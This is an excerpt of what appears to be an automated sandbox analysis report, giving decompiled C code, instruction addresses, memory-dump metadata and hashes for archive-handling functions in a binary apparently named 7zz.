									__eflags = _t402;
									if(_t402 != 0) {
										 *((intOrPtr*)( *_t402 + 8))(_t402);
									}
									_t362 = _t451;
									goto L105;
								}
							}
							 *(_t556 - 4) = 7;
							L0043361B(_t556 - 0x14);
							 *(_t556 - 4) = 2;
							E00429925(_t556 - 0x11c, __eflags); // executed
							 *(_t556 - 4) = 1;
							E004299B8(_t556 - 0x30);
							_t137 = _t556 - 4;
							 *_t137 =  *(_t556 - 4) & 0x00000000;
							__eflags =  *_t137;
							L0043361B(_t556 + 0x18);
							goto L35;
						}
						_t414 =  *(_t556 - 0x14);
						 *(_t556 - 4) = 7;
						__eflags = _t414 - _t449;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t414 + 8))(_t414);
						}
						 *(_t556 - 4) = 2;
						E00429925(_t556 - 0x11c, __eflags);
						 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
						 *(_t556 - 4) = 0xa;
						L22:
						E0040862D();
						 *(_t556 - 4) = 1;
						E00408604(_t556 - 0x30);
						_t361 =  *(_t556 + 0x18);
						 *(_t556 - 4) =  *(_t556 - 4) & 0x00000000;
						__eflags = _t361 - _t449;
						goto L97;
					}
					 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
					 *(_t556 - 4) = 6;
					goto L22;
				} else {
					_t443 =  *(_t556 + 0x18);
					 *(_t556 - 4) =  *(_t556 - 4) & 0x00000000;
					if(_t443 != _t449) {
						 *((intOrPtr*)( *_t443 + 8))(_t443);
					}
					L35:
					_t362 = 0;
					L105:
					 *[fs:0x0] =  *((intOrPtr*)(_t556 - 0xc));
					return _t362;
				}
			}



























































                                                                                  0x004290c5
                                                                                  0x004290ca
                                                                                  0x004290d6
                                                                                  0x004290dd
                                                                                  0x004290e3
                                                                                  0x004290e6
                                                                                  0x004290eb
                                                                                  0x004290ee
                                                                                  0x004290f1
                                                                                  0x004290f6
                                                                                  0x004290f6
                                                                                  0x004290fd
                                                                                  0x00429101
                                                                                  0x00429104
                                                                                  0x00429107
                                                                                  0x0042910f
                                                                                  0x0042911a
                                                                                  0x0042911a
                                                                                  0x00429120
                                                                                  0x0042913f
                                                                                  0x00429144
                                                                                  0x0042914b
                                                                                  0x0042914b
                                                                                  0x0042914d
                                                                                  0x00429151
                                                                                  0x00429154
                                                                                  0x00429154
                                                                                  0x00429157
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042915d
                                                                                  0x00429161
                                                                                  0x00429166
                                                                                  0x00429166
                                                                                  0x00429169
                                                                                  0x0042916c
                                                                                  0x00429175
                                                                                  0x00429178
                                                                                  0x0042917b
                                                                                  0x004291b1
                                                                                  0x004291b4
                                                                                  0x004291b6
                                                                                  0x004291c4
                                                                                  0x004291c4
                                                                                  0x004291d1
                                                                                  0x004291d7
                                                                                  0x004291dc
                                                                                  0x004291df
                                                                                  0x004291eb
                                                                                  0x004291ec
                                                                                  0x004291f0
                                                                                  0x004291fb
                                                                                  0x004291ff
                                                                                  0x00429215
                                                                                  0x0042921a
                                                                                  0x0042921a
                                                                                  0x0042921a
                                                                                  0x0042921d
                                                                                  0x00429221
                                                                                  0x00429224
                                                                                  0x00429227
                                                                                  0x0042922a
                                                                                  0x00429230
                                                                                  0x0042923d
                                                                                  0x00429240
                                                                                  0x00429243
                                                                                  0x00429246
                                                                                  0x00429248
                                                                                  0x0042924a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00429254
                                                                                  0x00429257
                                                                                  0x0042925c
                                                                                  0x0042925c
                                                                                  0x00000000
                                                                                  0x00429243
                                                                                  0x004291bb
                                                                                  0x004291bf
                                                                                  0x004291c2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042917d
                                                                                  0x0042917d
                                                                                  0x0042917e
                                                                                  0x0042918a
                                                                                  0x0042918e
                                                                                  0x00429192
                                                                                  0x0042919d
                                                                                  0x004291a1
                                                                                  0x004291a6
                                                                                  0x004291a9
                                                                                  0x004291aa
                                                                                  0x004291ac
                                                                                  0x00000000
                                                                                  0x004291ac
                                                                                  0x0042917b
                                                                                  0x00429262
                                                                                  0x00429270
                                                                                  0x00429272
                                                                                  0x004292a9
                                                                                  0x004292ae
                                                                                  0x004292b0
                                                                                  0x004292b4
                                                                                  0x004292b7
                                                                                  0x004292ba
                                                                                  0x004292bd
                                                                                  0x004292c0
                                                                                  0x004292c6
                                                                                  0x004292c9
                                                                                  0x004292cb
                                                                                  0x004292cf
                                                                                  0x004292dc
                                                                                  0x004292dc
                                                                                  0x004292d1
                                                                                  0x004292d8
                                                                                  0x004292d8
                                                                                  0x004292de
                                                                                  0x004292e0
                                                                                  0x004292e4
                                                                                  0x004292e7
                                                                                  0x004292ea
                                                                                  0x004292ef
                                                                                  0x004292ef
                                                                                  0x004292f2
                                                                                  0x004292f8
                                                                                  0x004292fc
                                                                                  0x00429301
                                                                                  0x00429301
                                                                                  0x00429303
                                                                                  0x00429306
                                                                                  0x0042930b
                                                                                  0x00429311
                                                                                  0x00429317
                                                                                  0x0042931d
                                                                                  0x00429320
                                                                                  0x00429327
                                                                                  0x00429329
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042935b
                                                                                  0x0042935e
                                                                                  0x0042939d
                                                                                  0x0042939f
                                                                                  0x004293a2
                                                                                  0x004293a5
                                                                                  0x004293ab
                                                                                  0x004293b1
                                                                                  0x004293b4
                                                                                  0x004293ba
                                                                                  0x004293bd
                                                                                  0x004293bf
                                                                                  0x004293c3
                                                                                  0x004293d0
                                                                                  0x004293d0
                                                                                  0x004293c5
                                                                                  0x004293cc
                                                                                  0x004293cc
                                                                                  0x004293d2
                                                                                  0x004293d4
                                                                                  0x004293d7
                                                                                  0x004293db
                                                                                  0x004293de
                                                                                  0x004293e3
                                                                                  0x004293e3
                                                                                  0x004293e9
                                                                                  0x004293ed
                                                                                  0x004293f0
                                                                                  0x004293f2
                                                                                  0x004293f5
                                                                                  0x00429400
                                                                                  0x00429400
                                                                                  0x00429406
                                                                                  0x0042941e
                                                                                  0x00429423
                                                                                  0x00429425
                                                                                  0x00429427
                                                                                  0x00429491
                                                                                  0x00429494
                                                                                  0x004294b9
                                                                                  0x004294c1
                                                                                  0x004294c9
                                                                                  0x004294d2
                                                                                  0x004294d8
                                                                                  0x004294de
                                                                                  0x004294e4
                                                                                  0x004294ee
                                                                                  0x004294f4
                                                                                  0x004294f8
                                                                                  0x004294fb
                                                                                  0x004294fe
                                                                                  0x00429502
                                                                                  0x00429504
                                                                                  0x00429508
                                                                                  0x00429512
                                                                                  0x00429512
                                                                                  0x00429517
                                                                                  0x00429544
                                                                                  0x00429549
                                                                                  0x0042954b
                                                                                  0x0042954e
                                                                                  0x004295ca
                                                                                  0x004295d0
                                                                                  0x0042965c
                                                                                  0x0042965e
                                                                                  0x004296b2
                                                                                  0x004296b5
                                                                                  0x004296bb
                                                                                  0x004296be
                                                                                  0x00429754
                                                                                  0x004297d1
                                                                                  0x004297d9
                                                                                  0x004297dd
                                                                                  0x00000000
                                                                                  0x004297dd
                                                                                  0x004296cb
                                                                                  0x004296cd
                                                                                  0x004296d1
                                                                                  0x004296d3
                                                                                  0x0042973a
                                                                                  0x00429742
                                                                                  0x00429746
                                                                                  0x00000000
                                                                                  0x00429746
                                                                                  0x004296d5
                                                                                  0x004296d8
                                                                                  0x004296da
                                                                                  0x004296df
                                                                                  0x004296df
                                                                                  0x004296e2
                                                                                  0x004296e5
                                                                                  0x004296e9
                                                                                  0x004296eb
                                                                                  0x004296f0
                                                                                  0x004296f0
                                                                                  0x004296f3
                                                                                  0x004296f6
                                                                                  0x004296fa
                                                                                  0x004296fc
                                                                                  0x00429701
                                                                                  0x00429701
                                                                                  0x0042970a
                                                                                  0x0042970e
                                                                                  0x00429716
                                                                                  0x0042971a
                                                                                  0x00000000
                                                                                  0x0042971a
                                                                                  0x00429660
                                                                                  0x00429663
                                                                                  0x00429667
                                                                                  0x00429669
                                                                                  0x0042966e
                                                                                  0x0042966e
                                                                                  0x00429671
                                                                                  0x00429674
                                                                                  0x00429678
                                                                                  0x0042967a
                                                                                  0x0042967f
                                                                                  0x0042967f
                                                                                  0x00429682
                                                                                  0x00429685
                                                                                  0x00429689
                                                                                  0x0042968b
                                                                                  0x00429690
                                                                                  0x00429690
                                                                                  0x00429699
                                                                                  0x0042969d
                                                                                  0x004296a2
                                                                                  0x004296a9
                                                                                  0x00000000
                                                                                  0x004296a9
                                                                                  0x004295e0
                                                                                  0x004295e2
                                                                                  0x004295e5
                                                                                  0x004295e7
                                                                                  0x004295eb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004295ed
                                                                                  0x004295ef
                                                                                  0x004295f4
                                                                                  0x004295f4
                                                                                  0x004295f7
                                                                                  0x004295fa
                                                                                  0x004295fe
                                                                                  0x00429600
                                                                                  0x00429605
                                                                                  0x00429605
                                                                                  0x00429608
                                                                                  0x0042960b
                                                                                  0x0042960f
                                                                                  0x00429611
                                                                                  0x00429616
                                                                                  0x00429616
                                                                                  0x0042961f
                                                                                  0x00429623
                                                                                  0x00429628
                                                                                  0x0042962f
                                                                                  0x00000000
                                                                                  0x00429550
                                                                                  0x0042955a
                                                                                  0x0042955c
                                                                                  0x0042955f
                                                                                  0x00429561
                                                                                  0x00429565
                                                                                  0x00429638
                                                                                  0x00429638
                                                                                  0x0042963a
                                                                                  0x0042963f
                                                                                  0x0042963f
                                                                                  0x00429642
                                                                                  0x00429645
                                                                                  0x00429649
                                                                                  0x0042964b
                                                                                  0x00429654
                                                                                  0x00429654
                                                                                  0x0042974b
                                                                                  0x0042974b
                                                                                  0x004297e2
                                                                                  0x004297e5
                                                                                  0x004297e8
                                                                                  0x004297ee
                                                                                  0x004297f1
                                                                                  0x004297f4
                                                                                  0x004297fa
                                                                                  0x00429800
                                                                                  0x00429803
                                                                                  0x00000000
                                                                                  0x00429803
                                                                                  0x0042956b
                                                                                  0x0042956d
                                                                                  0x00429572
                                                                                  0x00429572
                                                                                  0x00429575
                                                                                  0x00429578
                                                                                  0x0042957c
                                                                                  0x0042957e
                                                                                  0x00429583
                                                                                  0x00429583
                                                                                  0x00429586
                                                                                  0x00429589
                                                                                  0x0042958d
                                                                                  0x0042958f
                                                                                  0x00429594
                                                                                  0x00429594
                                                                                  0x0042959d
                                                                                  0x004295a1
                                                                                  0x004295a6
                                                                                  0x004295ad
                                                                                  0x004295b1
                                                                                  0x004295b4
                                                                                  0x004295bc
                                                                                  0x004295c0
                                                                                  0x0042971f
                                                                                  0x0042971f
                                                                                  0x00429722
                                                                                  0x00429726
                                                                                  0x00429728
                                                                                  0x00429728
                                                                                  0x0042972d
                                                                                  0x0042972d
                                                                                  0x00429730
                                                                                  0x00000000
                                                                                  0x00429730
                                                                                  0x0042954e
                                                                                  0x00429496
                                                                                  0x00429499
                                                                                  0x0042949d
                                                                                  0x0042949f
                                                                                  0x004294a8
                                                                                  0x004294a8
                                                                                  0x00000000
                                                                                  0x00429429
                                                                                  0x00429429
                                                                                  0x0042942c
                                                                                  0x00429430
                                                                                  0x00429432
                                                                                  0x00429437
                                                                                  0x00429437
                                                                                  0x0042943a
                                                                                  0x0042943d
                                                                                  0x00429441
                                                                                  0x00429443
                                                                                  0x00429448
                                                                                  0x00429448
                                                                                  0x00429451
                                                                                  0x00429455
                                                                                  0x0042945a
                                                                                  0x00429464
                                                                                  0x00429468
                                                                                  0x00429470
                                                                                  0x00429474
                                                                                  0x00429479
                                                                                  0x0042947c
                                                                                  0x00429480
                                                                                  0x00429482
                                                                                  0x00429487
                                                                                  0x00429487
                                                                                  0x0042948a
                                                                                  0x00000000
                                                                                  0x0042948a
                                                                                  0x00429427
                                                                                  0x00429363
                                                                                  0x00429367
                                                                                  0x00429372
                                                                                  0x00429376
                                                                                  0x0042937e
                                                                                  0x00429382
                                                                                  0x00429387
                                                                                  0x00429387
                                                                                  0x00429387
                                                                                  0x0042938e
                                                                                  0x00000000
                                                                                  0x0042938e
                                                                                  0x0042932b
                                                                                  0x0042932e
                                                                                  0x00429332
                                                                                  0x00429334
                                                                                  0x00429339
                                                                                  0x00429339
                                                                                  0x00429342
                                                                                  0x00429346
                                                                                  0x0042934b
                                                                                  0x00429352
                                                                                  0x0042927f
                                                                                  0x00429282
                                                                                  0x0042928a
                                                                                  0x0042928e
                                                                                  0x00429293
                                                                                  0x00429296
                                                                                  0x0042929a
                                                                                  0x00000000
                                                                                  0x0042929a
                                                                                  0x00429274
                                                                                  0x0042927b
                                                                                  0x00000000
                                                                                  0x00429122
                                                                                  0x00429122
                                                                                  0x00429125
                                                                                  0x0042912b
                                                                                  0x00429134
                                                                                  0x00429134
                                                                                  0x00429393
                                                                                  0x00429393
                                                                                  0x00429815
                                                                                  0x0042981a
                                                                                  0x00429823
                                                                                  0x00429823

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: e4c0a2cf1be0fd270f4cf5adca7858e0440031e4be77d2fa08e84f06a2b8deb6
                                                                                  • Instruction ID: 547796bb05142e1515dbc63510b15c43ea8da4dd30ba33bee99df57db7602c14
                                                                                  • Opcode Fuzzy Hash: e4c0a2cf1be0fd270f4cf5adca7858e0440031e4be77d2fa08e84f06a2b8deb6
                                                                                  • Instruction Fuzzy Hash: 84428E70A00259EFDB10DFA8D584BDDBBB4BF19304F54409EE849A7382CB78AE45CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00418554 Relevance: 1.9, APIs: 1, Instructions: 374COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 87%
                                                                                  			E00418554(intOrPtr __ecx) {
				intOrPtr _t181;
				signed int _t184;
				signed int* _t187;
				intOrPtr _t188;
				signed int* _t191;
				signed int* _t193;
				void* _t194;
				signed int* _t195;
				void* _t197;
				signed int* _t198;
				void* _t200;
				signed int* _t201;
				intOrPtr _t205;
				signed int* _t207;
				signed int* _t208;
				signed int* _t209;
				intOrPtr* _t213;
				intOrPtr* _t215;
				intOrPtr _t216;
				intOrPtr* _t217;
				intOrPtr* _t220;
				signed int* _t222;
				signed int* _t223;
				signed int* _t224;
				intOrPtr* _t232;
				signed int* _t234;
				signed int* _t235;
				signed int* _t236;
				intOrPtr* _t243;
				signed int* _t245;
				signed int* _t246;
				signed int* _t247;
				intOrPtr _t255;
				signed int _t266;
				signed int _t307;
				signed int _t313;
				intOrPtr _t317;
				signed int** _t319;
				intOrPtr _t320;
				void* _t322;

				L0046B890(E00474E2F, _t322);
				_push(_t313);
				 *((intOrPtr*)(_t322 - 0x20)) = __ecx;
				E00418540(__ecx);
				if( *((intOrPtr*)( *((intOrPtr*)(_t322 + 0xc)) + 8)) < 0x20) {
					while(1) {
						_t317 =  *((intOrPtr*)(_t322 + 0xc));
						_t307 = 1;
						_t313 = _t313 | 0xffffffff;
						_t181 =  *((intOrPtr*)(_t317 + 8));
						 *(_t322 - 0x24) = _t313;
						if(_t181 < _t307) {
							goto L6;
						}
						L4:
						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
						if(_t266 >= _t181) {
							L76:
							 *((char*)( *((intOrPtr*)(_t322 - 0x20)) + 0x30)) = _t266 & 0xffffff00 |  *( *((intOrPtr*)(_t322 - 0x20)) + 8) != 0x00000000;
							_t184 = 0;
							goto L77;
						}
						 *(_t322 - 0x24) =  *( *((intOrPtr*)(_t317 + 0xc)) + (_t181 - _t266) * 4 - 4);
						L7:
						if(_t266 != 0) {
							 *(_t322 - 0x38) = 0;
							 *((short*)(_t322 - 0x36)) = 0;
							_t319 =  *( *((intOrPtr*)( *((intOrPtr*)(_t322 - 0x20)) + 0xc)) + _t266 * 4 - 4);
							_t187 =  *_t319;
							 *(_t322 - 4) = _t307;
							_t188 =  *((intOrPtr*)( *_t187 + 0x20))(_t187, _t307, _t322 - 0x38);
							if(_t188 != 0) {
								L35:
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								_t320 = _t188;
								E0040C20F(_t322 - 0x38);
								L71:
								_t184 = _t320;
								goto L77;
							}
							if( *(_t322 - 0x38) != 0x13) {
								L75:
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								_t266 = _t322 - 0x38;
								E0040C20F(_t266);
								goto L76;
							}
							_t191 =  *_t319;
							_t313 =  *(_t322 - 0x30);
							_t188 =  *((intOrPtr*)( *_t191 + 0x14))(_t191, _t322 - 0x3c);
							if(_t188 != 0) {
								goto L35;
							}
							if(_t313 >=  *((intOrPtr*)(_t322 - 0x3c))) {
								goto L75;
							}
							 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
							E0040C20F(_t322 - 0x38);
							 *(_t322 - 0x10) = 0;
							_t193 =  *_t319;
							_t266 =  *_t193;
							 *(_t322 - 4) = 2;
							_t194 =  *_t266(_t193, 0x47a5e8, _t322 - 0x10);
							_t195 =  *(_t322 - 0x10);
							if(_t194 != 0 || _t195 == 0) {
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								goto L52;
							} else {
								 *(_t322 - 0x14) = 0;
								_t266 =  *_t195;
								 *(_t322 - 4) = 3;
								_t197 =  *((intOrPtr*)(_t266 + 0xc))(_t195, _t313, _t322 - 0x14);
								_t198 =  *(_t322 - 0x14);
								if(_t197 != 0 || _t198 == 0) {
									 *(_t322 - 4) = 2;
									goto L49;
								} else {
									 *(_t322 - 0x18) = 0;
									_t266 =  *_t198;
									 *(_t322 - 4) = 4;
									_t200 =  *_t266(_t198, 0x47a638, _t322 - 0x18);
									_t201 =  *(_t322 - 0x18);
									if(_t200 != 0 || _t201 == 0) {
										 *(_t322 - 4) = 3;
										goto L46;
									} else {
										E004189B9(_t322 - 0x78);
										_push(_t322 - 0x74);
										_push(_t313);
										 *(_t322 - 4) = 5;
										_t205 = L004179F7(_t319);
										 *((intOrPtr*)(_t322 - 0x28)) = _t205;
										if(_t205 != 0) {
											 *(_t322 - 4) = 4;
											L004039FA(_t322 - 0x78);
											_t207 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											if(_t207 != 0) {
												 *((intOrPtr*)( *_t207 + 8))(_t207);
											}
											_t208 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											if(_t208 != 0) {
												 *((intOrPtr*)( *_t208 + 8))(_t208);
											}
											_t209 =  *(_t322 - 0x10);
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											if(_t209 != 0) {
												 *((intOrPtr*)( *_t209 + 8))(_t209);
											}
											_t184 =  *((intOrPtr*)(_t322 - 0x28));
											goto L77;
										}
										 *((intOrPtr*)(_t322 - 0x1c)) = 0;
										_t213 =  *((intOrPtr*)(_t322 + 0x1c));
										 *(_t322 - 4) = 6;
										 *((intOrPtr*)( *_t213))(_t213, 0x47a5d8, _t322 - 0x1c);
										_t215 =  *((intOrPtr*)(_t322 - 0x1c));
										if(_t215 != 0) {
											 *((intOrPtr*)( *_t215 + 0xc))(_t215,  *((intOrPtr*)(_t322 - 0x74)));
										}
										 *(_t322 - 0x58) = _t313;
										_t216 = E00417BAE(_t322 - 0x78,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *(_t322 - 0x18), 0,  *((intOrPtr*)(_t322 + 0x1c)));
										 *((intOrPtr*)(_t322 - 0x28)) = _t216;
										if(_t216 == 1) {
											_t217 =  *((intOrPtr*)(_t322 - 0x1c));
											 *(_t322 - 4) = 5;
											if(_t217 != 0) {
												 *((intOrPtr*)( *_t217 + 8))(_t217);
											}
											_t266 = _t322 - 0x78;
											 *(_t322 - 4) = 4;
											L004039FA(_t266);
											_t201 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											L46:
											if(_t201 != 0) {
												_t266 =  *_t201;
												 *((intOrPtr*)(_t266 + 8))(_t201);
											}
											_t198 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											L49:
											if(_t198 != 0) {
												_t266 =  *_t198;
												 *((intOrPtr*)(_t266 + 8))(_t198);
											}
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											_t195 =  *(_t322 - 0x10);
											L52:
											if(_t195 != 0) {
												_t266 =  *_t195;
												 *((intOrPtr*)(_t266 + 8))(_t195);
											}
											goto L76;
										} else {
											if(_t216 != 0) {
												_t220 =  *((intOrPtr*)(_t322 - 0x1c));
												 *(_t322 - 4) = 5;
												if(_t220 != 0) {
													 *((intOrPtr*)( *_t220 + 8))(_t220);
												}
												 *(_t322 - 4) = 4;
												L004039FA(_t322 - 0x78);
												_t222 =  *(_t322 - 0x18);
												 *(_t322 - 4) = 3;
												if(_t222 != 0) {
													 *((intOrPtr*)( *_t222 + 8))(_t222);
												}
												_t223 =  *(_t322 - 0x14);
												 *(_t322 - 4) = 2;
												if(_t223 != 0) {
													 *((intOrPtr*)( *_t223 + 8))(_t223);
												}
												_t224 =  *(_t322 - 0x10);
												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
												if(_t224 != 0) {
													 *((intOrPtr*)( *_t224 + 8))(_t224);
												}
												_t184 =  *((intOrPtr*)(_t322 - 0x28));
												goto L77;
											}
											_push(_t322 - 0x4c);
											_push(_t322 - 0x54);
											_push(_t313);
											_t320 = L00417B16(_t319);
											if(_t320 != 0) {
												_t232 =  *((intOrPtr*)(_t322 - 0x1c));
												 *(_t322 - 4) = 5;
												if(_t232 != 0) {
													 *((intOrPtr*)( *_t232 + 8))(_t232);
												}
												 *(_t322 - 4) = 4;
												L004039FA(_t322 - 0x78);
												_t234 =  *(_t322 - 0x18);
												 *(_t322 - 4) = 3;
												if(_t234 != 0) {
													 *((intOrPtr*)( *_t234 + 8))(_t234);
												}
												_t235 =  *(_t322 - 0x14);
												 *(_t322 - 4) = 2;
												if(_t235 != 0) {
													 *((intOrPtr*)( *_t235 + 8))(_t235);
												}
												_t236 =  *(_t322 - 0x10);
												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
												if(_t236 != 0) {
													 *((intOrPtr*)( *_t236 + 8))(_t236);
												}
												goto L71;
											}
											_push(_t322 - 0x78);
											E00418F34( *((intOrPtr*)(_t322 - 0x20)));
											_t243 =  *((intOrPtr*)(_t322 - 0x1c));
											 *(_t322 - 4) = 5;
											if(_t243 != 0) {
												 *((intOrPtr*)( *_t243 + 8))(_t243);
											}
											 *(_t322 - 4) = 4;
											L004039FA(_t322 - 0x78);
											_t245 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											if(_t245 != 0) {
												 *((intOrPtr*)( *_t245 + 8))(_t245);
											}
											_t246 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											if(_t246 != 0) {
												 *((intOrPtr*)( *_t246 + 8))(_t246);
											}
											_t247 =  *(_t322 - 0x10);
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											if(_t247 != 0) {
												 *((intOrPtr*)( *_t247 + 8))(_t247);
											}
											while(1) {
												_t317 =  *((intOrPtr*)(_t322 + 0xc));
												_t307 = 1;
												_t313 = _t313 | 0xffffffff;
												_t181 =  *((intOrPtr*)(_t317 + 8));
												 *(_t322 - 0x24) = _t313;
												if(_t181 < _t307) {
													goto L6;
												}
												goto L4;
											}
										}
									}
								}
							}
						}
						E004189B9(_t322 - 0xb4);
						 *(_t322 - 4) = 0;
						E00401E26(_t322 - 0xb0,  *((intOrPtr*)(_t322 + 0x18)));
						 *(_t322 - 0x94) = _t313;
						_t255 = E004183FD(_t322 - 0xb4,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *((intOrPtr*)(_t322 + 0x10)),  *((intOrPtr*)(_t322 + 0x14)),  *((intOrPtr*)(_t322 + 0x1c))); // executed
						_t320 = _t255;
						if(_t320 != 0) {
							 *(_t322 - 4) = _t313;
							L004039FA(_t322 - 0xb4);
							goto L71;
						}
						_push(_t322 - 0xb4);
						E00418F34( *((intOrPtr*)(_t322 - 0x20)));
						 *(_t322 - 4) = _t313;
						L004039FA(_t322 - 0xb4);
						continue;
						L6:
						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
						if(_t266 >= 0x20) {
							goto L76;
						}
						goto L7;
					}
				} else {
					_t184 = 0x80004001;
					L77:
					 *[fs:0x0] =  *((intOrPtr*)(_t322 - 0xc));
					return _t184;
				}
			}











































                                                                                  0x00418559
                                                                                  0x00418566
                                                                                  0x00418567
                                                                                  0x0041856a
                                                                                  0x00418578
                                                                                  0x00418586
                                                                                  0x00418586
                                                                                  0x0041858b
                                                                                  0x0041858c
                                                                                  0x0041858f
                                                                                  0x00418592
                                                                                  0x00418597
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00418599
                                                                                  0x0041859c
                                                                                  0x004185a1
                                                                                  0x0041899a
                                                                                  0x004189a3
                                                                                  0x004189a6
                                                                                  0x00000000
                                                                                  0x004189a6
                                                                                  0x004185b0
                                                                                  0x004185c4
                                                                                  0x004185c6
                                                                                  0x00418633
                                                                                  0x00418637
                                                                                  0x0041863e
                                                                                  0x00418642
                                                                                  0x0041864c
                                                                                  0x0041864f
                                                                                  0x00418654
                                                                                  0x00418814
                                                                                  0x00418814
                                                                                  0x0041881b
                                                                                  0x0041881d
                                                                                  0x0041896f
                                                                                  0x0041896f
                                                                                  0x00000000
                                                                                  0x0041896f
                                                                                  0x0041865f
                                                                                  0x0041898e
                                                                                  0x0041898e
                                                                                  0x00418992
                                                                                  0x00418995
                                                                                  0x00000000
                                                                                  0x00418995
                                                                                  0x00418665
                                                                                  0x00418667
                                                                                  0x00418671
                                                                                  0x00418676
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0041867f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00418685
                                                                                  0x0041868c
                                                                                  0x00418691
                                                                                  0x00418694
                                                                                  0x0041869f
                                                                                  0x004186a2
                                                                                  0x004186a9
                                                                                  0x004186ad
                                                                                  0x004186b0
                                                                                  0x00418985
                                                                                  0x00000000
                                                                                  0x004186be
                                                                                  0x004186be
                                                                                  0x004186c1
                                                                                  0x004186c9
                                                                                  0x004186cd
                                                                                  0x004186d2
                                                                                  0x004186d5
                                                                                  0x0041897c
                                                                                  0x00000000
                                                                                  0x004186e3
                                                                                  0x004186e3
                                                                                  0x004186e6
                                                                                  0x004186f2
                                                                                  0x004186f6
                                                                                  0x004186fa
                                                                                  0x004186fd
                                                                                  0x00418973
                                                                                  0x00000000
                                                                                  0x0041870b
                                                                                  0x0041870e
                                                                                  0x00418718
                                                                                  0x00418719
                                                                                  0x0041871a
                                                                                  0x0041871e
                                                                                  0x00418725
                                                                                  0x00418728
                                                                                  0x0041882a
                                                                                  0x0041882e
                                                                                  0x00418833
                                                                                  0x00418836
                                                                                  0x0041883c
                                                                                  0x00418841
                                                                                  0x00418841
                                                                                  0x00418844
                                                                                  0x00418847
                                                                                  0x0041884d
                                                                                  0x00418852
                                                                                  0x00418852
                                                                                  0x00418855
                                                                                  0x00418858
                                                                                  0x0041885e
                                                                                  0x00418863
                                                                                  0x00418863
                                                                                  0x00418866
                                                                                  0x00000000
                                                                                  0x00418866
                                                                                  0x0041872e
                                                                                  0x00418731
                                                                                  0x00418740
                                                                                  0x00418744
                                                                                  0x00418746
                                                                                  0x0041874b
                                                                                  0x00418753
                                                                                  0x00418753
                                                                                  0x0041875c
                                                                                  0x00418769
                                                                                  0x00418771
                                                                                  0x00418774
                                                                                  0x0041886e
                                                                                  0x00418871
                                                                                  0x00418877
                                                                                  0x0041887c
                                                                                  0x0041887c
                                                                                  0x0041887f
                                                                                  0x00418882
                                                                                  0x00418886
                                                                                  0x0041888b
                                                                                  0x0041888e
                                                                                  0x00418892
                                                                                  0x00418894
                                                                                  0x00418896
                                                                                  0x00418899
                                                                                  0x00418899
                                                                                  0x0041889c
                                                                                  0x0041889f
                                                                                  0x004188a3
                                                                                  0x004188a5
                                                                                  0x004188a7
                                                                                  0x004188aa
                                                                                  0x004188aa
                                                                                  0x004188ad
                                                                                  0x004188b1
                                                                                  0x004188b4
                                                                                  0x004188b6
                                                                                  0x004188bc
                                                                                  0x004188bf
                                                                                  0x004188bf
                                                                                  0x00000000
                                                                                  0x0041877a
                                                                                  0x0041877c
                                                                                  0x004188c7
                                                                                  0x004188ca
                                                                                  0x004188d0
                                                                                  0x004188d5
                                                                                  0x004188d5
                                                                                  0x004188db
                                                                                  0x004188df
                                                                                  0x004188e4
                                                                                  0x004188e7
                                                                                  0x004188ed
                                                                                  0x004188f2
                                                                                  0x004188f2
